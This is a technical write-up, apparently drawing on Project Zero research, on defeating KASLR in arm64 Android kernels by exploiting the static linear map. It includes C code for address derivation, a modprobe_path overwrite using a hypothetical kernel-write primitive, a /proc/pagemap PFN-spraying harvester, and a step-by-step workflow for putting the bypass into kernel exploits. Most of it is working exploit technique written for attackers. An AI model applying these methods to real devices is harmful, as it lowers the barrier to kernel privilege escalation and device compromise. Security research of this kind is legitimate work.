Linux arm64 Static Linear Map KASLR Bypass

Overview

Android kernels built for arm64 almost universally enable CONFIG_ARM64_VA_BITS=39 (3-level paging) and CONFIG_MEMORY_HOTPLUG=y. With only 512 GiB of kernel virtual space available, the Linux developers chose to anchor the linear map at the lowest possible kernel VA so that future hot-plugged RAM can simply extend the mapping upward. Since commit 1db780bafa4c, arm64 no longer even attempts to randomize that placement, which means:

  • PAGE_OFFSET = 0xffffff8000000000 is compiled in.
  • PHYS_OFFSET is sourced from the exported memstart_addr, which on stock Android devices is effectively constant (0x80000000 today).

As a consequence, every physical page has a deterministic linear-map virtual address that is independent of the KASLR slide:

#define phys_to_virt(p) (((unsigned long)(p) - 0x80000000UL) | 0xffffff8000000000UL)

If an attacker can learn or influence a physical address (kernel object, PFN from /proc/pagemap, or even a user-controlled page), they instantly know the corresponding kernel virtual address without leaking the randomized primary kernel mapping.
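
To make the transform concrete, here is a minimal, self-contained C sketch using the constants above (it runs anywhere and needs no kernel access; the constants are the stock-Android values quoted in this page):

#include <stdio.h>

#define PHYS_OFFSET 0x80000000UL          /* memstart_addr on stock Android */
#define PAGE_OFFSET 0xffffff8000000000UL  /* CONFIG_ARM64_VA_BITS=39 linear map base */

/* Static linear-map transform: physical address -> kernel virtual address. */
static unsigned long phys_to_virt(unsigned long phys) {
    return (phys - PHYS_OFFSET) | PAGE_OFFSET;
}

int main(void) {
    printf("0x%lx\n", phys_to_virt(0x80000000UL)); /* base of RAM -> PAGE_OFFSET */
    printf("0x%lx\n", phys_to_virt(0x80010000UL)); /* -> 0xffffff8000010000 */
    return 0;
}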

Reading memstart_addr and confirming the transform

The memstart_addr symbol appears in /proc/kallsyms, so its VA can be obtained on rooted devices; reading its value then only takes an arbitrary kernel-read primitive. Project Zero used Jann Horn’s tracing-BPF helper (bpf_arb_read) to dump it directly:

grep memstart /proc/kallsyms
# ... obtains memstart_addr virtual address
./bpf_arb_read <addr_of_memstart_addr> 8

The bytes 00 00 00 80 00 00 00 00 confirm memstart_addr = 0x80000000. Once PAGE_OFFSET and PHYS_OFFSET are pinned, the arm64 linear map is a static affine transform of any physical address.
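
If you want to script the lookup, a minimal sketch that finds the symbol's VA in /proc/kallsyms (addresses read back as zero unless you are root or kptr_restrict permits; dumping the 8-byte value at that VA still requires a read primitive such as bpf_arb_read):

#include <stdio.h>
#include <string.h>

int main(void) {
    FILE *f = fopen("/proc/kallsyms", "r");
    if (!f) { perror("kallsyms"); return 1; }
    char line[256];
    while (fgets(line, sizeof line, f)) {
        unsigned long addr; char type, name[128];
        /* kallsyms line format: "<hex addr> <type> <name> [module]" */
        if (sscanf(line, "%lx %c %127s", &addr, &type, name) == 3 &&
            !strcmp(name, "memstart_addr")) {
            printf("memstart_addr @ 0x%lx\n", addr);
            break;
        }
    }
    fclose(f);
    return 0;
}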

Deriving stable .data addresses on devices with a fixed kernel physbase

Many Pixel devices still decompress the kernel to phys_kernel_base = 0x80010000 on every boot (visible in /proc/iomem). Combining that fixed physical base with the static transform yields cross-reboot-stable addresses for any data symbol:

  1. Record the randomized kernel virtual address of _stext and of your target symbol from /proc/kallsyms (or from the exact vmlinux).
  2. Compute the offset: offset = sym_virt - _stext_virt.
  3. Add the static boot-time physbase: phys_sym = 0x80010000 + offset.
  4. Convert to a linear-map VA: virt_sym = phys_to_virt(phys_sym).

Example (modprobe_path on a Pixel 9): offset = 0x1fe2398, phys = 0x81ff2398, virt = 0xffffff8001ff2398. After multiple reboots, bpf_arb_read 0xffffff8001ff2398 returns the same bytes, so exploit payloads can treat 0xffffff8000010000 as a synthetic, non-randomized base for all .data offsets.
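
A sketch of the whole derivation under the assumptions above; the _stext slide is a made-up illustrative value (only the intra-image offset matters), and the printed results reproduce the Pixel 9 numbers:

#include <stdio.h>

#define PAGE_OFFSET      0xffffff8000000000UL
#define PHYS_OFFSET      0x80000000UL   /* memstart_addr */
#define PHYS_KERNEL_BASE 0x80010000UL   /* fixed physbase from /proc/iomem */

int main(void) {
    /* Step 1: randomized VAs as read from /proc/kallsyms on this boot
     * (hypothetical slide; only the difference between them matters). */
    unsigned long stext_virt = 0xffffffd000210000UL;
    unsigned long sym_virt   = stext_virt + 0x1fe2398UL;  /* modprobe_path */

    unsigned long offset   = sym_virt - stext_virt;                  /* Step 2 */
    unsigned long phys_sym = PHYS_KERNEL_BASE + offset;              /* Step 3 */
    unsigned long virt_sym = (phys_sym - PHYS_OFFSET) | PAGE_OFFSET; /* Step 4 */

    printf("offset=0x%lx phys=0x%lx virt=0x%lx\n", offset, phys_sym, virt_sym);
    /* -> offset=0x1fe2398 phys=0x81ff2398 virt=0xffffff8001ff2398 */
    return 0;
}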

This mapping is RW, so any primitive that can place attacker data in kernel virtual space (double free, UAF, out-of-bounds heap write, etc.) can patch credentials, LSM hooks, or dispatch tables without ever leaking the true KASLR slide. The only limitation is that .text is mapped non-executable in the linear map, so gadget hunting still requires a traditional leak.
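
To illustrate the data-patching case: given any arbitrary-write primitive (kwrite below is a hypothetical stand-in for whatever your bug provides), the classic modprobe_path overwrite needs no KASLR leak at all:

/* Hypothetical wrapper around your kernel-write primitive (UAF, OOB, ...). */
void kwrite(unsigned long kva, const void *buf, unsigned long len);

void hijack_modprobe(void) {
    /* Reboot-stable linear-map VA precomputed with the steps above. */
    unsigned long modprobe_path = 0xffffff8001ff2398UL;
    /* 18 bytes = 17 chars + NUL; fits well inside KMOD_PATH_LEN (256). */
    kwrite(modprobe_path, "/data/local/tmp/x", 18);
}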

PFN spraying when the kernel physbase is randomized

Vendors such as Samsung randomize the kernel load PFN, but the static linear map is still abusable because PFN allocation is not fully random (a condensed sketch of the harvesting loop follows the list):

  1. Spray user pages: mmap() ~5 GiB, touch every page to fault it in.
  2. Harvest PFNs: read /proc/pagemap for each page (or use another PFN leak) to collect the backing PFN list.
  3. Repeat and profile: reboot, rerun 100×, build a histogram showing how often each PFN was attacker-controlled. Some PFNs are white-hot (allocated 100/100 times shortly after boot).
  4. Convert PFN → kernel VA:
    • phys = (pfn << PAGE_SHIFT) + offset_in_page
    • virt = phys_to_virt(phys)
  5. Forge kernel objects in those pages and steer victim pointers (UAF, overflow, etc.) to the known linear-map addresses.
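
A condensed sketch of steps 1, 2 and 4 (pagemap format per Documentation/admin-guide/mm/pagemap.rst: bit 63 = page present, bits 0-54 = PFN; on modern kernels reading non-zero PFNs from pagemap requires CAP_SYS_ADMIN):

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

#define PAGE_SHIFT  12
#define PHYS_OFFSET 0x80000000UL
#define PAGE_OFFSET 0xffffff8000000000UL

int main(void) {
    size_t spray = 1UL << 30;  /* 1 GiB for the sketch; scale to ~5 GiB on device */
    uint8_t *buf = mmap(NULL, spray, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) return 1;
    memset(buf, 0x41, spray);  /* touch every page so it is faulted in */

    int pm = open("/proc/self/pagemap", O_RDONLY);
    if (pm < 0) return 1;
    for (size_t off = 0; off < spray; off += 1UL << PAGE_SHIFT) {
        uint64_t entry;
        off_t idx = (off_t)(((uintptr_t)buf + off) >> PAGE_SHIFT) * 8;
        if (pread(pm, &entry, 8, idx) != 8 || !(entry >> 63))
            continue;                        /* unreadable or not present */
        uint64_t pfn  = entry & ((1UL << 55) - 1);
        uint64_t virt = ((pfn << PAGE_SHIFT) - PHYS_OFFSET) | PAGE_OFFSET;
        printf("user %p -> pfn 0x%llx -> kernel VA 0x%llx\n",
               buf + off, (unsigned long long)pfn, (unsigned long long)virt);
    }
    close(pm);
    return 0;  /* rerun across reboots and histogram the recurring PFNs */
}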

Because the linear map is identity-mapped RW memory, this technique lets you place fully attacker-controlled data at deterministic kernel VAs even when the real kernel base moves. Exploits can prebuild fake file_operations, cred, or refcount structures inside the sprayed pages and then pivot existing kernel pointers into them.

Practical workflow for arm64 Android exploits

  1. Info gathering
    • Root or use a kernel read primitive to dump memstart_addr, _stext, and the target symbol from /proc/kallsyms.
    • On Pixels, trust the static physbase from /proc/iomem; on other devices, prepare the PFN profiler.
  2. Address calculation
    • Apply the offset math above and cache the resulting linear-map VAs in your exploit.
    • For PFN spraying, keep a list of “reliable” PFNs that repeatedly land in attacker memory.
  3. Exploit integration
    • When an arbitrary write is available, directly patch targets such as modprobe_path, init_cred, or security ops arrays at the precomputed addresses.
    • When only a heap corruption exists, craft fake objects inside the sprayed, attacker-controlled pages and repoint victim pointers to their known linear-map VAs.
  4. Verification
    • Use bpf_arb_read or any safe read primitive to sanity-check that the computed address contains the expected bytes before destructive writes.

This workflow eliminates the KASLR-leak stage for data-centric kernel exploits on Android, which drastically lowers exploit complexity and improves reliability.
